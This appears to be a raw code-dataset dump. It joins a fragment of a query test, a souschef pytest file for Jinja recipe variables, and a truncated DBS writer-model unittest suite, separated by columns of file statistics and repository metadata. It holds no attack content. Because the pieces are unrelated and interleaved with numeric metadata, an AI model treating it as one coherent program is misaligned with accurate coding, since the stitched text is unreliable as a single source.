qres = cde.query(query)
results = []
for row in qres:
results.append(list(row))
assert len(results) == 20
| 40.634981
| 110
| 0.549265
| 1,145
| 10,687
| 4.985153
| 0.153712
| 0.056412
| 0.079713
| 0.115627
| 0.831815
| 0.796076
| 0.761037
| 0.755081
| 0.740715
| 0.733532
| 0
| 0.025544
| 0.285674
| 10,687
| 262
| 111
| 40.790076
| 0.722164
| 0.069804
| 0
| 0.645455
| 0
| 0
| 0.408864
| 0.006554
| 0
| 0
| 0
| 0
| 0.409091
| 1
| 0.027273
| false
| 0
| 0.109091
| 0
| 0.136364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
31091d09e6962bc0d86f8c7052feab814c54a4f9
| 1,676
|
py
|
Python
|
tests/test_jinja_expression.py
|
sgbaird/souschef
|
a1cf400d104aab85c963f473cca02af9706fd7b0
|
[
"Apache-2.0"
] | 4
|
2022-01-05T17:59:15.000Z
|
2022-01-24T14:55:47.000Z
|
tests/test_jinja_expression.py
|
sgbaird/souschef
|
a1cf400d104aab85c963f473cca02af9706fd7b0
|
[
"Apache-2.0"
] | 29
|
2020-11-15T00:39:02.000Z
|
2022-01-16T14:33:37.000Z
|
tests/test_jinja_expression.py
|
sgbaird/souschef
|
a1cf400d104aab85c963f473cca02af9706fd7b0
|
[
"Apache-2.0"
] | 1
|
2022-01-14T03:22:16.000Z
|
2022-01-14T03:22:16.000Z
|
from souschef.jinja_expression import (
get_global_jinja_var,
is_jinja_expression,
set_global_jinja_var,
)
def test_add_jinja_var(pure_yaml_with_comments):
set_global_jinja_var(pure_yaml_with_comments, "version", "10.9.8")
assert get_global_jinja_var(pure_yaml_with_comments, "version") == "10.9.8"
def test_is_jinja_expression(simple_full_recipe):
assert is_jinja_expression(simple_full_recipe[0])
assert not is_jinja_expression(simple_full_recipe[-1])
def test_get_global_jinja_var(simple_full_recipe):
assert get_global_jinja_var(simple_full_recipe, "name") == "mat_discover"
assert get_global_jinja_var(simple_full_recipe, "version") == "1.2.1"
def test_get_global_jinja_var_multiple_one_line(multiple_jinja_var_same_line):
assert get_global_jinja_var(multiple_jinja_var_same_line, "name") == "mat_discover"
assert get_global_jinja_var(multiple_jinja_var_same_line, "version") == "1.2.1"
def test_set_global_jinja_var(simple_full_recipe):
set_global_jinja_var(simple_full_recipe, "name", "NEW_NAME")
assert get_global_jinja_var(simple_full_recipe, "name") == "NEW_NAME"
set_global_jinja_var(simple_full_recipe, "version", "3.2.1")
assert get_global_jinja_var(simple_full_recipe, "version") == "3.2.1"
def test_set_global_jinja_var_multiple_one_line(multiple_jinja_var_same_line):
set_global_jinja_var(multiple_jinja_var_same_line, "name", "NEW_NAME")
assert get_global_jinja_var(multiple_jinja_var_same_line, "name") == "NEW_NAME"
set_global_jinja_var(multiple_jinja_var_same_line, "version", "3.2.1")
assert get_global_jinja_var(multiple_jinja_var_same_line, "version") == "3.2.1"
| 39.904762
| 87
| 0.794153
| 267
| 1,676
| 4.41573
| 0.142322
| 0.196777
| 0.237489
| 0.173028
| 0.898219
| 0.890585
| 0.780322
| 0.717557
| 0.668363
| 0.502969
| 0
| 0.018654
| 0.104415
| 1,676
| 41
| 88
| 40.878049
| 0.766822
| 0
| 0
| 0
| 0
| 0
| 0.106205
| 0
| 0
| 0
| 0
| 0
| 0.407407
| 1
| 0.222222
| false
| 0
| 0.037037
| 0
| 0.259259
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
31c49cc9638e6d1bf1a475de373d6b09644a51a5
| 56,776
|
py
|
Python
|
Server/Python/tests/dbsserver_t/unittests/web_t/DBSWriterModel_t.py
|
vkuznet/DBS
|
14df8bbe8ee8f874fe423399b18afef911fe78c7
|
[
"Apache-2.0"
] | 8
|
2015-08-14T04:01:32.000Z
|
2021-06-03T00:56:42.000Z
|
Server/Python/tests/dbsserver_t/unittests/web_t/DBSWriterModel_t.py
|
yuyiguo/DBS
|
14df8bbe8ee8f874fe423399b18afef911fe78c7
|
[
"Apache-2.0"
] | 162
|
2015-01-07T21:34:47.000Z
|
2021-10-13T09:42:41.000Z
|
Server/Python/tests/dbsserver_t/unittests/web_t/DBSWriterModel_t.py
|
yuyiguo/DBS
|
14df8bbe8ee8f874fe423399b18afef911fe78c7
|
[
"Apache-2.0"
] | 16
|
2015-01-22T15:27:29.000Z
|
2021-04-28T09:23:28.000Z
|
"""
web unittests
"""
from __future__ import print_function
__revision__ = "$Id: DBSWriterModel_t.py,v 1.27 2010/08/24 19:48:44 yuyi Exp $"
__version__ = "$Revision: 1.27 $"
import os
import sys
import unittest
import time
import uuid
import traceback
from ctypes import *
from cherrypy import request, response, HTTPError
from dbsserver_t.utils.DBSRestApi import DBSRestApi
from WMCore.WebTools.FrontEndAuth import FrontEndAuth
config = os.environ["DBS_TEST_CONFIG"]
service = os.environ.get("DBS_TEST_SERVICE", "DBSWriter")
api = DBSRestApi(config, service)
uid = uuid.uuid4().time_mid
print("****uid=%s******" %uid)
acquisition_era_name="Acq_Era_%s" %uid
processing_version="%s" %(uid if (uid<9999) else uid%9999)
primary_ds_name = 'unittest_web_primary_ds_name_%s' % uid
procdataset = '%s-unittest_web_dataset-v%s' % (acquisition_era_name, processing_version)
childprocdataset = '%s-unittest_web_child_dataset-v%s' % (acquisition_era_name, processing_version)
parent_procdataset = '%s-unittest_web_parent_dataset-v%s' % (acquisition_era_name, processing_version)
tier = 'GEN-SIM-RAW'
tier2 = 'RAW'
dataset="/%s/%s/%s" % (primary_ds_name, procdataset, tier)
dataset2="/%s/%s/%s" % (primary_ds_name, procdataset, tier2)
child_dataset="/%s/%s/%s" % (primary_ds_name, childprocdataset, tier)
print("dataset = ", dataset)
print("dataset2 = ", dataset2)
print("child_dataset = ", child_dataset)
app_name='cmsRun'
output_module_label='Merged-%s' %uid
global_tag='my_tag-%s'%uid
pset_hash='76e303993a1c2f842159dbfeeed9a0dd'
release_version='CMSSW_1_2_%s' % uid
site="cmssrm-%s.fnal.gov" %uid
block="%s#%s" % (dataset, uid)
block2="%s#%s" % (dataset2, uid)
child_block="%s#%s" % (child_dataset, uid)
parent_block="%s#%s" % (parent_procdataset, uid)
run_num=uid
flist=[]
primary_ds_type='test'
prep_id = 'MC_12344'
child_prep_id = 'MC_3455'
stepchain_dataset = "/%s_stepchain/%s/%s" % (primary_ds_name, procdataset, tier)
stepchain_block="%s#%s" % (stepchain_dataset, uid)
parent_stepchain_dataset="/%s_stepchain/%s/%s" % (primary_ds_name, parent_procdataset, tier)
parent_stepchain_block="%s#%s" % (parent_stepchain_dataset, uid)
print("parent_stepchain_block = ", parent_block)
print("stepchain_block = ", block)
outDict={
"primary_ds_name" : primary_ds_name,
"procdataset" : procdataset,
"tier" : tier,
"dataset" : dataset,
"child_dataset" : child_dataset,
"app_name" : app_name,
"output_module_label" : output_module_label,
"global_tag": global_tag,
"pset_hash" : pset_hash,
"release_version" : release_version,
"site" : site,
"block" : block,
"child_block" : child_block,
"files" : [],
"parent_files" : [],
"run_num":run_num,
"acquisition_era":acquisition_era_name,
"processing_version" : processing_version,
"primary_ds_type" : primary_ds_type,
"child_prep_id" : child_prep_id,
"prep_id" : prep_id,
"stepchain_dataset": stepchain_dataset,
"stepchain_block": stepchain_block,
"parent_stepchain_dataset": parent_stepchain_dataset,
"parent_stepchain_block": parent_stepchain_block,
"stepchain_files": [],
"parent_stepchain_files": []
}
class checkException(object):
def __init__(self, msg):
self.msg = msg
def __call__(self,func,*args,**kwargs):
def wrapper(*args,**kwargs):
out = None
test_class = args[0]
try:
out = func(*args,**kwargs)
except Exception as ex:
if self.msg not in ex.args[0]:
test_class.fail("Exception was expected and was not raised")
else:
test_class.fail("Exception was expected and was not raised")
return out
return wrapper
class DBSWriterModel_t(unittest.TestCase):
def test01a(self):
"""test01a: web.DBSWriterModel.insertPrimaryDataset: basic test\n"""
data = {'primary_ds_name':primary_ds_name,
'primary_ds_type':primary_ds_type}
api.insert('primarydatasets', data)
def test01b(self):
"""tes01b: web.DBSWriterModel.insertPrimaryDataset: duplicate should not raise an exception\n"""
data = {'primary_ds_name':primary_ds_name,
'primary_ds_type':primary_ds_type}
api.insert('primarydatasets', data)
@checkException("Primary dataset Name is required for insertPrimaryDataset")
def test01c(self):
"""test01c: web.DBSWriterModel.insertPrimaryDataset: missing primary_ds_name, must throw exception\n"""
data = {'primary_ds_type':primary_ds_type}
junk = api.insert('primarydatasets', data)
def test02a(self):
"""test 02a: web.DBSWriterModel.insertOutputModule: basic test"""
data = {'release_version': release_version, 'pset_hash': pset_hash,
'app_name': app_name, 'output_module_label': output_module_label, 'global_tag':global_tag}
api.insert('outputconfigs', data)
def test02b(self):
"""test02b: web.DBSWriterModel.insertOutputModule: re-insertion should not raise any errors"""
data = {'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
'output_module_label': output_module_label, 'global_tag':global_tag}
api.insert('outputconfigs', data)
@checkException("app_name")
def test02c(self):
"""test02c: web.DBSWriterModel.insertOutputModule: missing parameter must cause an exception"""
data = {'pset_hash': pset_hash,
'output_module_label': output_module_label,
'release_version': release_version}
api.insert('outputconfigs', data)
@checkException("pset_hash")
def test02d(self):
"""test02d: web.DBSWriterModel.insertOutputModule: missing parameter must cause an exception"""
data = {'app_name': app_name,
'output_module_label': output_module_label,
'release_version': release_version}
api.insert('outputconfigs', data)
@checkException("output_module_label")
def test02e(self):
"""test02e: web.DBSWriterModel.insertOutputModule: missing parameter must cause an exception"""
data = {'pset_hash': pset_hash,
'app_name': app_name,
'release_version': release_version}
api.insert('outputconfigs', data)
@checkException("release_version")
def test02f(self):
"""test02f: web.DBSWriterModel.insertOutputModule: missing parameter must cause an exception"""
data = {'pset_hash': pset_hash,
'app_name': app_name,
'output_module_label': output_module_label
}
api.insert('outputconfigs', data)
def test03a(self):
"""test03a: web.DBSWriterModel.insertAcquisitionEra: Basic test """
data={'acquisition_era_name': acquisition_era_name}
api.insert('acquisitioneras', data)
@checkException("acquisition_era_name")
def test03b(self):
"""test03b: web.DBSWriterModel.insertAcquisitionEra: duplicate test """
data={'acquisition_era_name': acquisition_era_name}
api.insert('acquisitioneras', data)
@checkException("acquisition_era_name")
def test03c(self):
"""test03c: web.DBSWriterModel.insertAcquisitionEra: missing parameter should raise an exception """
data={}
api.insert('acquisitioneras', data)
def test04a(self):
"""test04a: web.DBSWriterModel.insertProcessingEra: Basic test """
data={'processing_version': processing_version, 'description':'this-is-a-test'}
api.insert('processingeras', data)
def test04b(self):
"""test04b: web.DBSWriterModel.insertProcessingEra: duplicate test """
data={'processing_version': processing_version, 'description':'this-is-a-test'}
api.insert('processingeras', data)
@checkException("processing_version")
def test04c(self):
"""test04c: web.DBSWriterModel.insertProcessingEra: duplicate test """
data={'description':'this-is-a-test'}
api.insert('processingeras', data)
def test05a(self):
"""test05a: web.DBSWriterModel.insertDataset(Dataset is construct by DBSDatset.): basic test"""
data = {
'physics_group_name': 'Tracker', 'dataset': dataset,
'dataset_access_type': 'VALID', 'processed_ds_name': procdataset, 'primary_ds_name': primary_ds_name,
'output_configs': [
{'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
'output_module_label': output_module_label, 'global_tag': global_tag},
],
'xtcrosssection': 123, 'primary_ds_type': 'test', 'data_tier_name': tier,
'prep_id':prep_id,
'processing_version': processing_version, 'acquisition_era_name': acquisition_era_name
}
api.insert('datasets', data)
childdata = {
'physics_group_name': 'Tracker', 'dataset': child_dataset,
'dataset_access_type': 'VALID', 'processed_ds_name': childprocdataset, 'primary_ds_name': primary_ds_name,
'output_configs': [
{'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
'output_module_label': output_module_label, 'global_tag': global_tag},
],
'xtcrosssection': 123, 'primary_ds_type': 'test', 'data_tier_name': tier,
'prep_id': child_prep_id,
'processing_version': processing_version, 'acquisition_era_name': acquisition_era_name,
}
api.insert('datasets', childdata)
def test05a2(self):
"""test05a2: web.DBSWriterModel.insertDataset(Dataset is construct by DBSDatset.): basic test\n"""
data = {
'physics_group_name': 'Tracker', 'dataset': dataset2,
'dataset_access_type': 'VALID', 'processed_ds_name': procdataset, 'primary_ds_name': primary_ds_name,
'output_configs': [
{'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
'output_module_label': output_module_label, 'global_tag': global_tag},
],
'xtcrosssection': 123, 'primary_ds_type': 'test', 'data_tier_name': tier2,
'prep_id':prep_id,
'processing_version': processing_version, 'acquisition_era_name': acquisition_era_name
}
api.insert('datasets', data)
def test05b(self):
"""test05b: web.DBSWriterModel.insertDataset: duplicate insert should be ignored"""
data = {
'physics_group_name': 'Tracker', 'dataset': dataset,
'dataset_access_type': 'VALID', 'processed_ds_name': procdataset, 'primary_ds_name': primary_ds_name,
'output_configs': [
{'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
'output_module_label': output_module_label, 'global_tag': global_tag},
],
'xtcrosssection': 123, 'primary_ds_type': 'test', 'data_tier_name': tier,
'prep_id':prep_id,
'processing_version': processing_version, 'acquisition_era_name': acquisition_era_name
}
api.insert('datasets', data)
@checkException("primary_ds_name")
def test05c(self):
"""test05c: web.DBSWriterModel.insertDataset: missing primary_ds_name must raise an error"""
data = {
'physics_group_name': 'Tracker', 'dataset': dataset,
'dataset_access_type': 'VALID', 'processed_ds_name': procdataset,
'output_configs': [
{'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
'output_module_label': output_module_label, 'global_tag': global_tag},
],
'xtcrosssection': 123, 'primary_ds_type': 'test', 'data_tier_name': tier,
'prep_id':prep_id,
'processing_version': processing_version, 'acquisition_era_name': acquisition_era_name
}
api.insert('datasets', data)
@checkException("dataset_access_type")
def test05d(self):
"""test05d: web.DBSWriterModel.insertDataset: missing parameter must raise an error"""
data = {
'physics_group_name': 'Tracker', 'dataset': dataset,
'processed_ds_name': procdataset, 'primary_ds_name': primary_ds_name,
'output_configs': [
{'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
'output_module_label': output_module_label, 'global_tag': global_tag},
],
'xtcrosssection': 123, 'primary_ds_type': 'test', 'data_tier_name': tier,
'prep_id':prep_id,
'processing_version': processing_version, 'acquisition_era_name': acquisition_era_name
}
api.insert('datasets', data)
@checkException("dataset")
def test05e(self):
"""test05e: web.DBSWriterModel.insertDataset: missing parameter must raise an error"""
data = {
'physics_group_name': 'Tracker',
'dataset_access_type': 'VALID', 'processed_ds_name': procdataset, 'primary_ds_name': primary_ds_name,
'output_configs': [
{'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
'output_module_label': output_module_label, 'global_tag': global_tag},
],
'xtcrosssection': 123, 'primary_ds_type': 'test', 'data_tier_name': tier,
'prep_id':prep_id,
'processing_version': processing_version, 'acquisition_era_name': acquisition_era_name
}
api.insert('datasets', data)
@checkException("processed_ds_name")
def test05f(self):
"""test05f: web.DBSWriterModel.insertDataset: missing parameter must raise an error"""
data = {
'physics_group_name': 'Tracker', 'dataset': dataset,
'dataset_access_type': 'VALID', 'primary_ds_name': primary_ds_name,
'output_configs': [
{'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
'output_module_label': output_module_label, 'global_tag': global_tag},
],
'xtcrosssection': 123, 'primary_ds_type': 'test', 'data_tier_name': tier,
'prep_id':prep_id,
'processing_version': processing_version, 'acquisition_era_name': acquisition_era_name
}
api.insert('datasets', data)
@checkException("data_tier_name")
def test05g(self):
"""test05g: web.DBSWriterModel.insertDataset: missing parameter must raise an error"""
data = {
'physics_group_name': 'Tracker', 'dataset': dataset,
'dataset_access_type': 'VALID', 'processed_ds_name': procdataset, 'primary_ds_name': primary_ds_name,
'output_configs': [
{'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
'output_module_label': output_module_label, 'global_tag': global_tag},
],
'xtcrosssection': 123, 'primary_ds_type': 'test',
'prep_id':prep_id,
'processing_version': processing_version, 'acquisition_era_name': acquisition_era_name
}
api.insert('datasets', data)
@checkException("acquisition_era_name")
def test05h(self):
"""test05h: web.DBSWriterModel.insertDataset: no output_configs, must raise an error!"""
data = {
'dataset': dataset,
'physics_group_name': 'Tracker', 'primary_ds_name': primary_ds_name,
'dataset_access_type': 'VALID', 'processed_ds_name': procdataset,
'xtcrosssection': 123, 'primary_ds_type': 'test', 'data_tier_name': tier,
'prep_id':prep_id
}
api.insert('datasets', data)
def test06a(self):
"""test06a: web.DBSWriterModel.insertBlock: basic test"""
data = {'block_name': block,
'origin_site_name': site }
api.insert('blocks', data)
# insert the child block as well
data = {'block_name': child_block, 'origin_site_name': site }
api.insert('blocks', data)
def test06a2(self):
"""test06a: web.DBSWriterModel.insertBlock: basic test"""
data = {'block_name': block2,
'origin_site_name': site }
api.insert('blocks', data)
def test06b(self):
"""test06b: web.DBSWriterModel.insertBlock: duplicate insert should not raise exception"""
data = {'block_name': block,
'origin_site_name': site }
api.insert('blocks', data)
@checkException("block_name")
def test06c(self):
"""test06c: web.DBSWriterModel.insertBlock: missing parameter should raise exception"""
data = {'origin_site_name': site }
api.insert('blocks', data)
@checkException("origin_site_name")
def test06d(self):
"""test06d: web.DBSWriterModel.insertBlock: missing parameter should raise exception"""
data = {'block_name': block}
api.insert('blocks', data)
def test07a(self):
"""test07a: web.DBSWriterModel.insertFiles: basic test"""
data={}
flist=[]
for i in range(10):
f={
'adler32': '', 'file_type': 'EDM',
'file_output_config_list':
[
{'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
'output_module_label': output_module_label, 'global_tag': global_tag},
],
'dataset': dataset,
'file_size': u'2012211901', 'auto_cross_section': 0.0,
'check_sum': u'1504266448',
'file_lumi_list': [
{'lumi_section_num': u'27414', 'run_num': uid},
{'lumi_section_num': u'26422', 'run_num': uid},
{'lumi_section_num': u'29838', 'run_num': uid}
],
'file_parent_list': [ ],
'event_count': u'1619',
'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uid, i),
'block_name': block,
#'is_file_valid': 1
}
flist.append(f)
data={"files":flist}
api.insert('files', data)
def test07a2(self):
"""test07a2: web.DBSWriterModel.insertFiles with events per lumi : basic test\n"""
data={}
flist=[]
for i in range(10):
f={
'adler32': '', 'file_type': 'EDM',
'file_output_config_list':
[
{'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
'output_module_label': output_module_label, 'global_tag': global_tag},
],
'dataset': dataset2,
'file_size': u'2012211901', 'auto_cross_section': 0.0,
'check_sum': u'1504266448',
'file_lumi_list': [
{'lumi_section_num': u'27414', 'run_num': uid+1, 'event_count': 10},
{'lumi_section_num': u'26422', 'run_num': uid+1, 'event_count': 20},
{'lumi_section_num': u'29838', 'run_num': uid+1, 'event_count': 30}
],
'file_parent_list': [ ],
'event_count': u'60',
'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/RAW/IDEAL_/%s/%i.root" %(uid+1, i),
'block_name': block2,
#'is_file_valid': 1
}
flist.append(f)
data={"files":flist}
api.insert('files', data)
def test07b(self):
"""test07b: web.DBSWriterModel.insertFiles: duplicate insert file shuld not raise any errors"""
data={}
flist=[]
for i in range(10):
f={
'adler32': '', 'file_type': 'EDM',
'file_output_config_list':
[
{'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
'output_module_label': output_module_label, 'global_tag': global_tag},
],
'dataset': dataset,
'file_size': u'2012211901', 'auto_cross_section': 0.0,
'check_sum': u'1504266448',
'file_lumi_list': [
{'lumi_section_num': u'27414', 'run_num': u'1'},
{'lumi_section_num': u'26422', 'run_num': u'1'},
{'lumi_section_num': u'29838', 'run_num': u'1'}
],
'file_parent_list': [ ],
'event_count': u'1619',
'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uid, i),
'block_name': block,
#'is_file_valid': 1
}
flist.append(f)
outDict['files'].append(f['logical_file_name'])
data={"files":flist}
api.insert('files', data)
def test07c(self):
"""test07c: web.DBSWriterModel.insertFiles: with parents"""
data={}
flist=[]
for i in range(10):
f={
'adler32': u'NOSET', 'file_type': 'EDM',
'file_output_config_list':
[
{'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
'output_module_label': output_module_label, 'global_tag': global_tag},
],
'dataset': child_dataset,
'file_size': u'2012211901', 'auto_cross_section': 0.0,
'check_sum': u'1504266448',
'file_lumi_list': [
{'lumi_section_num': u'27414', 'run_num': u'1'},
{'lumi_section_num': u'26422', 'run_num': u'1'},
{'lumi_section_num': u'29838', 'run_num': u'1'}
],
'file_parent_list': [{"file_parent_lfn": "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uid, i)}],
'event_count': u'1619',
'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL-child/%s/%i.root" %(uid, i),
'block_name': child_block
#'is_file_valid': 1
}
flist.append(f)
outDict['files'].append(f['logical_file_name'])
outDict['parent_files'].append(f['file_parent_list'][0]['file_parent_lfn'])
data={"files":flist}
api.insert('files', data)
@checkException("logical_file_name")
def test07d(self):
"""test07d: web.DBSWriterModel.insertFiles: missing parameter should raise an exception"""
data={}
flist=[]
for i in range(10):
f={
'adler32': '', 'file_type': 'EDM',
'file_output_config_list':
[
{'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
'output_module_label': output_module_label, 'global_tag': global_tag},
],
'dataset': dataset,
'file_size': u'2012211901', 'auto_cross_section': 0.0,
'check_sum': u'1504266448',
'file_lumi_list': [
{'lumi_section_num': u'27414', 'run_num': u'1'},
{'lumi_section_num': u'26422', 'run_num': u'1'},
{'lumi_section_num': u'29838', 'run_num': u'1'}
],
'file_parent_list': [ ],
'event_count': u'1619',
'block_name': block,
#'is_file_valid': 1
}
flist.append(f)
data={"files":flist}
api.insert('files', data)
@checkException("block_name")
def test07e(self):
"""test07e: web.DBSWriterModel.insertFiles: missing parameter should raise an exception"""
data={}
flist=[]
for i in range(10):
f={
'adler32': '', 'file_type': 'EDM',
'file_output_config_list':
[
{'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
'output_module_label': output_module_label, 'global_tag': global_tag},
],
'dataset': dataset,
'file_size': u'2012211901', 'auto_cross_section': 0.0,
'check_sum': u'1504266448',
'file_lumi_list': [
{'lumi_section_num': u'27414', 'run_num': u'1'},
{'lumi_section_num': u'26422', 'run_num': u'1'},
{'lumi_section_num': u'29838', 'run_num': u'1'}
],
'file_parent_list': [ ],
'event_count': u'1619',
'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uid, i),
#'is_file_valid': 1
}
flist.append(f)
data={"files":flist}
api.insert('files', data)
@checkException("dataset")
def test07f(self):
"""test07f: web.DBSWriterModel.insertFiles: missing parameter should raise an exception"""
data={}
flist=[]
for i in range(10):
f={
'adler32': '', 'file_type': 'EDM',
'file_output_config_list':
[
{'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
'output_module_label': output_module_label, 'global_tag': global_tag},
],
'file_size': u'2012211901', 'auto_cross_section': 0.0,
'check_sum': u'1504266448',
'file_lumi_list': [
{'lumi_section_num': u'27414', 'run_num': u'1'},
{'lumi_section_num': u'26422', 'run_num': u'1'},
{'lumi_section_num': u'29838', 'run_num': u'1'}
],
'file_parent_list': [ ],
'event_count': u'1619',
'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uid, i),
'block_name': block,
#'is_file_valid': 1
}
flist.append(f)
data={"files":flist}
api.insert('files', data)
@checkException("check_sum")
def test07g(self):
"""test07g: web.DBSWriterModel.insertFiles: missing check_sum, adler32 or MD5 parameter should raise an exception"""
data={}
flist=[]
for i in range(10):
f={
'dataset': dataset,
'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uid, i),
'block_name': block,
#'is_file_valid': 1
}
flist.append(f)
data={"files":flist}
api.insert('files', data)
def test07h(self):
"""test07h: web.DBSWriterModel.insertFiles: minimal parameters"""
data={}
flist=[]
for i in range(10):
f={
'dataset': dataset,
'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uid, i),
'block_name': block,
'check_sum' : "1234",
'adler32': "abc123"
#'is_file_valid': 1
}
flist.append(f)
data={"files":flist}
api.insert('files', data)
def test07i(self):
"""test07i: web.DBSWriterModel.insertFiles: minimal parameters"""
data={}
flist=[]
for i in range(10):
f={
'dataset': dataset,
'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uid, i),
'block_name': block,
'check_sum' : "1234"
#'is_file_valid': 1
}
flist.append(f)
data={"files":flist}
api.insert('files', data)
def test07j(self):
"""test07j: web.DBSWriterModel.insertFiles: minimal parameters"""
data={}
flist=[]
for i in range(10):
f={
'dataset': dataset,
'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uid, i),
'block_name': block,
'adler32': "abc123"
#'is_file_valid': 1
}
flist.append(f)
data={"files":flist}
api.insert('files', data)
def test07k(self):
"""test07k: web.DBSWriterModel.insertFiles: minimal parameters"""
data={}
flist=[]
for i in range(10):
f={
'dataset': dataset,
'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uid, i),
'block_name': block,
'md5': "abc"
#'is_file_valid': 1
}
flist.append(f)
data={"files":flist}
api.insert('files', data)
def test08a(self):
"""test08a: testweb.DBSWriterModel.insertDataTier: Basic test"""
data = {'data_tier_name':tier}
api.insert('datatiers', data)
@checkException("data_tier_name")
def test08b(self):
"""test08b: web.DBSWriterModel.insertDataTier: missing data should raise exception"""
data = {}
api.insert('datatiers', data)
def test09a(self):
"""test09a: web.DBSWriterModel.updateDatasetType: Basic test """
api.update('datasets', dataset=dataset, dataset_access_type="DEPRECATED")
@checkException("dataset_access_type")
def test09b(self):
"""test22a web.DBSWriterModel.updateDatasetType: Basic test """
api.update('datasets')
@checkException("Invalid Input")
def test09b1(self):
"""test22a web.DBSWriterModel.updateDatasetType with a wrong type: Basic test """
api.update('datasets', dataset=dataset, dataset_access_type="DEPRECAT")
@checkException("dataset")
def test09c(self):
"""test09c: web.DBSWriterModel.updateDatasetType: Basic test """
api.update('datasets', dataset_access_type="DEPRECATED")
def test10a(self):
"""test10a: web.DBSWriterModel.updateFileStatus: Basic test logical_file_name"""
lfn = "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL-child/%s/%i.root" %(uid, 1)
api.update('files', logical_file_name=lfn, is_file_valid=0)
def test10b(self):
"""test10b: web.DBSWriterModel.updateFileStatus: Basic test logical_file_name list"""
lfn = ["/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL-child/%s/%i.root" % (uid, 1),
"/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL-child/%s/%i.root" % (uid, 2)]
api.update('files', logical_file_name=lfn, is_file_valid=0)
def test10c(self):
"""test10c: web.DBSWriterModel.updateFileStatus: Basic test logical_file_name and lost"""
lfn = "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL-child/%s/%i.root" %(uid, 1)
api.update('files', logical_file_name=lfn, is_file_valid=0, lost=1)
def test10d(self):
"""test10d: web.DBSWriterModel.updateFileStatus: Basic test logical_file_name list and lost"""
lfn = ["/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL-child/%s/%i.root" % (uid, 1),
"/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL-child/%s/%i.root" % (uid, 2)]
api.update('files', logical_file_name=lfn, is_file_valid=0, lost=1)
def test11a(self):
"""test11a: web.DBSWriterModel.updateBlock: Basic test"""
api.update('blocks', block_name=block, open_for_writing=0)
@checkException("block_name")
def test11b(self):
"""test11b: web.DBSWriterModel.updateBlock: missing data should raise exception"""
api.update('blocks')
def test11c(self):
"""test11c: web.DBSWriterModel.updateBlock: origin_site_name test"""
api.update('blocks', block_name=block, origin_site_name=site)
def test11d(self):
"""test11d: web.DBSWriterModel.updateBlock: origin_site_name and open_for_writing test"""
api.update('blocks', block_name=block, origin_site_name=site, open_for_writing=1)
@checkException("already exists")
def test12a(self):
"""test12a: web.DBSWriterModel.insertBulkBlock: existing block will raise an exception"""
dataset_dict = {'dataset': dataset,
'physics_group_name': 'Tracker', 'primary_ds_name': primary_ds_name,
'dataset_access_type': 'VALID', 'processed_ds_name': procdataset,
'xtcrosssection': 123, 'primary_ds_type': primary_ds_type, 'data_tier_name': tier,
'prep_id':prep_id}
block_dict = {'block_name': block,
'origin_site_name': site}
processing_dict = {'processing_version': processing_version,
'description':'this-is-a-test'}
acquisition_dict = {'acquisition_era_name': acquisition_era_name}
primary_dict = {'primary_ds_name':primary_ds_name,
'primary_ds_type':primary_ds_type}
output_module_dict = {'release_version': release_version, 'pset_hash': pset_hash,
